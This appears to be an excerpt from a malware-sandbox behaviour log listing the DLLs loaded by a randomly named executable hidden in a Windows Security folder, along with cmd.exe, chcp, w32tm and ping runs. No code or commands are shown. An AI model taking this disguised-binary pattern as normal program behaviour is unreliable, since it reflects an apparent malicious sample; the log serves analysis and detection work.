Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sppc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: propsys.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	Section loaded: appresolver.dll
